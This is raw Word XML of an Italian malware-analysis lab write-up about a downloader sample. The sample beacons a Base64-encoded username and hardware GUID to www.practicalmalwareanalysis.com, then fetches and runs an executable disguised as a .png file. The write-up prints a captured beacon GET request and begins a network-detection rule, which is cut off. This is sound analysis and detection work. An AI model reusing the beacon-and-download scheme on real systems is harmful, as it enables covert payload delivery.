            <wp:extent cx="2710543" cy="1592444"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1227317528" name="Immagine 4" descr="Immagine che contiene testo, schermata, schermo, numero&#10;&#10;Descrizione generata automaticamente">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7528" name="Immagine 4" descr="Immagine che contiene testo, schermata, schermo, numero&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId301"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2728639" cy="1603075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD16E2" w14:textId="772D67D1" w:rsidR="000B1427" w:rsidRDefault="002265B7" w:rsidP="000B1427">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il pacchetto è stato compilato con Microsoft Visual c++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD483A0" w14:textId="33742B99" w:rsidR="002265B7" w:rsidRDefault="002265B7" w:rsidP="002438F2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50B58165" wp14:editId="7F7B2AC9">
            <wp:extent cx="532130" cy="2214154"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="6719049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4992" name="Immagine 671904992"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId303"/>
                    <a:srcRect b="58439"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="542451" cy="2257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B957AA" wp14:editId="22D1B555">
            <wp:extent cx="532130" cy="2212031"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1311689890" name="Immagine 13116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4992" name="Immagine 671904992"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId303"/>
                    <a:srcRect t="58479"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="542451" cy="2254935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8FC4C" w14:textId="58483732" w:rsidR="002438F2" w:rsidRDefault="002438F2" w:rsidP="002438F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Vediamo molte stringhe senza apparente significato, probabilmente offuscate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218436E4" w14:textId="52B9F27C" w:rsidR="002438F2" w:rsidRDefault="007177F6" w:rsidP="007177F6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="007177F6">
        <w:t>1) Quali librerie di rete utilizza il malware e quali sono i suoi vantaggi?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038B0FD" w14:textId="2F51C451" w:rsidR="00281FC8" w:rsidRDefault="005E5236" w:rsidP="00663780">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE52559" wp14:editId="04C949CE">
            <wp:extent cx="6645910" cy="759460"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1723006620" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente">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6620" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId304"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId305"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="759460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D96B3" w14:textId="0240A98D" w:rsidR="005E5236" w:rsidRDefault="005E5236" w:rsidP="00FB1ADB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05B54936" wp14:editId="3D08DB46">
            <wp:extent cx="3964577" cy="3835057"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="45024380" name="Immagine 7" descr="Immagine che contiene testo, schermata, numero, Carattere&#10;&#10;Descrizione generata automaticamente">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380" name="Immagine 7" descr="Immagine che contiene testo, schermata, numero, Carattere&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId306"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId307"/>
                    <a:srcRect l="3736" r="7476"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3976957" cy="3847033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CE4A3" w14:textId="6BBBF121" w:rsidR="00CB3DC3" w:rsidRDefault="00CB3DC3" w:rsidP="00CB3DC3">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La libreria di rete importata è urlmon che ci viene anche segnalata in blacklist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4127AACB" w14:textId="7A427EC5" w:rsidR="00CB3DC3" w:rsidRDefault="004C1114" w:rsidP="00CB3DC3">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Di questa libreria utilizza la funzione </w:t>
      </w:r>
      <w:r w:rsidRPr="004C1114">
        <w:t>URLDownloadToCacheFile</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="009C0510">
        <w:t xml:space="preserve"> alla riga 401209.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DADD8A" w14:textId="70E61EE3" w:rsidR="009C0510" w:rsidRDefault="009C0510" w:rsidP="00CB3DC3">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="473BF0A9" wp14:editId="1ABF6EC2">
            <wp:extent cx="6645910" cy="2785110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1158300859" name="Immagine 8" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">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0859" name="Immagine 8" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId308"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId309"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2785110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8C70D" w14:textId="5F15F9EA" w:rsidR="009C0510" w:rsidRDefault="00A51631" w:rsidP="00B447EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51631">
        <w:t>2) Quali elementi di origine vengono utilizzati per costruire il beacon di rete e quali condizioni causerebbero il cambiamento del beacon?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F2F6E1" w14:textId="77777777" w:rsidR="001F43B1" w:rsidRDefault="001F43B1" w:rsidP="001F43B1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Gli ultimi 12 byte del GUID per il profilo hardware corrente del sistema, che è specifico per ciascun utente, e il nome utente corrente vengono utilizzati per costruire il beacon. Un utente diverso che ha effettuato l'accesso o un profilo hardware diverso causerebbe la modifica del beacon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF5DFB1" w14:textId="77777777" w:rsidR="001F43B1" w:rsidRDefault="001F43B1" w:rsidP="001F43B1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C936DDB" w14:textId="77777777" w:rsidR="001F43B1" w:rsidRDefault="001F43B1" w:rsidP="001F43B1">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La prima cosa che fa il malware è chiamare GetCurrentHwProfile ed estrarre gli ultimi 12 byte del GUID a 36 byte per il profilo hardware dell'utente corrente. Quindi chiama GetUserName . Entrambi vengono inseriti in una stringa di formato, con il nome utente per primo e il GUID per secondo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7FB8F" w14:textId="0FD167E6" w:rsidR="00B447EE" w:rsidRDefault="001175A6" w:rsidP="001175A6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8B949B" wp14:editId="6D6391E3">
            <wp:extent cx="5989320" cy="6465570"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="174803281" name="Immagine 9" descr="Immagine che contiene testo, schermata, schermo, software&#10;&#10;Descrizione generata automaticamente">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281" name="Immagine 9" descr="Immagine che contiene testo, schermata, schermo, software&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId310"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId311"/>
                    <a:srcRect r="9872" b="2705"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989824" cy="6466114"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AB6CD" w14:textId="145A404F" w:rsidR="001175A6" w:rsidRDefault="00E66FB9" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La stringa viene poi codificate in Base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C982E" w14:textId="77777777" w:rsidR="00D714E8" w:rsidRDefault="00D714E8" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C916D8" w14:textId="77777777" w:rsidR="00D714E8" w:rsidRDefault="00D714E8" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8ECB06" w14:textId="3EB59802" w:rsidR="00D714E8" w:rsidRDefault="00A2071B" w:rsidP="00A2071B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00A2071B">
        <w:lastRenderedPageBreak/>
        <w:t>3) Perché le informazioni incorporate nel beacon di rete potrebbero interessare l'attaccante?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73BBD9" w14:textId="50911CBE" w:rsidR="00D714E8" w:rsidRDefault="00A2071B" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00A2071B">
        <w:t>Da queste informazioni l'attaccante ha un nome utente valido per il sistema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2071B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2071B">
        <w:t xml:space="preserve">noltre </w:t>
      </w:r>
      <w:r w:rsidR="003C20C1">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2071B">
        <w:t xml:space="preserve">dentifica in modo univoco l'host </w:t>
      </w:r>
      <w:r w:rsidR="004D484D">
        <w:t>anche se più utenti venissero infettati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A34744C" w14:textId="103B0DF8" w:rsidR="000D1C58" w:rsidRDefault="000D1C58" w:rsidP="000D1C58">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="000D1C58">
        <w:t>4) Il malware utilizza la codifica Base64 standard? In caso contrario, in che modo la codifica è insolita?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C62A1D" w14:textId="441A9F2B" w:rsidR="003C20C1" w:rsidRDefault="00FF5FF8" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF5FF8">
        <w:t xml:space="preserve">Il malware non utilizza Base64 standard. Usa il carattere </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF5FF8">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF5FF8">
        <w:t xml:space="preserve">invece che </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF5FF8">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF5FF8">
        <w:t>per il padding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE07552" w14:textId="77777777" w:rsidR="00FF5FF8" w:rsidRDefault="00FF5FF8" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE87D7E" w14:textId="6D8ECC83" w:rsidR="000D1C58" w:rsidRDefault="00FF5FF8" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A48AD03" wp14:editId="6F4CDBEF">
            <wp:extent cx="6645910" cy="4028440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1387267635" name="Immagine 10" descr="Immagine che contiene testo, schermata, linea, diagramma&#10;&#10;Descrizione generata automaticamente">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67635" name="Immagine 10" descr="Immagine che contiene testo, schermata, linea, diagramma&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId312"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId313"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4028440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0603EED0" w14:textId="494094DC" w:rsidR="00A06C37" w:rsidRDefault="00463FB6" w:rsidP="00A06C37">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00463FB6">
        <w:t>5) Qual è lo scopo generale di questo malware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1DE0C" w14:textId="7220C7BB" w:rsidR="00FF5FF8" w:rsidRDefault="00463FB6" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00463FB6">
        <w:t>Questo programma è un downloader. Il malware si identifica in modo univoco su un server con una richiesta GET e scarica un file eseguibile con un'estensione .png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00463FB6">
        <w:t>L'eseguibile viene quindi eseguito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122EFAD" w14:textId="119996D2" w:rsidR="00906318" w:rsidRDefault="00EE240F" w:rsidP="00906318">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE240F">
        <w:t>6) Quali elementi della comunicazione del malware possono essere effettivamente rilevati utilizzando una firma di rete?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337380DA" w14:textId="0424E7AA" w:rsidR="00906318" w:rsidRDefault="009243B4" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abbiamo visto che il malware scarica un eseguibile dal dominio </w:t>
      </w:r>
      <w:hyperlink r:id="rId314" w:history="1">
        <w:r w:rsidRPr="00AE2FF6">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>www.practicalmalwareanalysis.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD0EAC">
        <w:t xml:space="preserve">, è possibile quindi filtrare le richieste verso quel dominio ed in particolare al file </w:t>
      </w:r>
      <w:r w:rsidR="00182F43">
        <w:t>.png che tenterà si scaricare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2DCB4" w14:textId="77777777" w:rsidR="00BE7AEB" w:rsidRDefault="00BE7AEB" w:rsidP="00387151">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B15483E" w14:textId="3A077A9B" w:rsidR="00182F43" w:rsidRDefault="00BE7AEB" w:rsidP="00BE7AEB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE240F">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7AEB">
        <w:t>Quali errori potrebbero commettere gli analisti nel tentativo di sviluppare una firma per questo malware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51096026" w14:textId="3493FB74" w:rsidR="00A81F90" w:rsidRDefault="001D053E" w:rsidP="00BE7AEB">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilizzando </w:t>
      </w:r>
      <w:r w:rsidR="00DC2701">
        <w:t xml:space="preserve">come parametro una stringa troppo specifica, che non tenga conto dei parametri del nome utente e host. </w:t>
      </w:r>
      <w:r w:rsidR="005413F3">
        <w:t>Basandosi solo sulle richieste al file .png in questione, magari in futuro potrebbe cambiare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59644278" w14:textId="6D6B7C13" w:rsidR="004B4698" w:rsidRDefault="004A61FC" w:rsidP="004B4698">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="004B4698" w:rsidRPr="00EE240F">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="004A61FC">
        <w:t>Quale set di firme rileverebbe questo malware (e varianti future)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438A52E5" w14:textId="2099988A" w:rsidR="00397FF4" w:rsidRDefault="007406E5" w:rsidP="004B4698">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="279FD824" wp14:editId="0CE7F7F7">
            <wp:extent cx="6758034" cy="3122023"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="2143078224" name="Immagine 11" descr="Immagine che contiene testo, schermata, design&#10;&#10;Descrizione generata automaticamente">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8224" name="Immagine 11" descr="Immagine che contiene testo, schermata, design&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId315"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId316"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6761621" cy="3123680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB491B9" w14:textId="192A529A" w:rsidR="00397FF4" w:rsidRDefault="00F138C4" w:rsidP="004A43A8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="957"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07AF9386" wp14:editId="23F11E11">
            <wp:extent cx="4304211" cy="4138475"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1905"/>
            <wp:docPr id="2071071261" name="Immagine 12" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">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1261" name="Immagine 12" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId317"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId318"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4385875" cy="4216994"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D6C334" w14:textId="5A0B90DC" w:rsidR="004B4698" w:rsidRDefault="004B4698" w:rsidP="004A43A8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="957"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00397FF4">
        <w:lastRenderedPageBreak/>
        <w:t>GET /0DA6NmU6NmY6NmU6Njk6NjMtdW5pbmEa/a.png HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7029E" w14:textId="166E3D43" w:rsidR="0020517C" w:rsidRDefault="00587564" w:rsidP="00425BAE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="957"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E30DF1A" wp14:editId="40205A69">
            <wp:extent cx="4735286" cy="2871214"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="2001666988" name="Immagine 13" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">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66988" name="Immagine 13" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId319"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId320"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4757509" cy="2884689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB22D39" w14:textId="404B62DB" w:rsidR="00D03BF6" w:rsidRDefault="00D03BF6" w:rsidP="00D03BF6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="957"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Regole base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B525C07" w14:textId="77777777" w:rsidR="005C7EC6" w:rsidRDefault="005C7EC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03391"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">1. alert tcp any any -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>3.33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
